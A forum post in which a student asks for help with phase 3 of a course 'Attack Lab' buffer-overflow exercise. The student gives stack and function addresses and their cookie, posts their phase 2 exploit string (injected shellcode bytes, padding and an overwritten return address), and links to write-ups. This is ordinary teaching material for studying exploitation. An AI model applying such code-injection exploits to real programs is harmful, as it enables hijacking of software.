Attack Lab Phase 3
I am stuck on attack lab phase 3. I have a 28 byte buffer in getbuf.
This is my rsp address:
0x5565c940
This is my touch 3 address
0x4018d0
This is my cookie:
0x7fef911b
In byte code the cookie is:
37 66 65 66 39 31 31 62
I just cant seem to figure out the padding. It seems as if all the examples use the same padding value from their phase 2.
My phase 2 had a different approach then all the online examples.
Here was my phase 2 answer:
68 fb 17 40 00 bf 1b 91 ef 7f c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
18 c9 65 55 00 00 00 00
I pushed the return address of phase 2 to the stack, moved my cookie to rdi.
Im stuck now because I dont really know how to calculate the padding values for phase3. The idea is that we cant store our cookie in the getbuf stack because the hexmmatch function will overwrite it and mess us up our cookie. SO we store the cookie outside of the getbuf. You can refer to this I think its helpful somehow. https://github.com/magna25/Attack-Lab/blob/master/Phase%203.md
or this : https://siyangshao.github.io/posts/202206240956/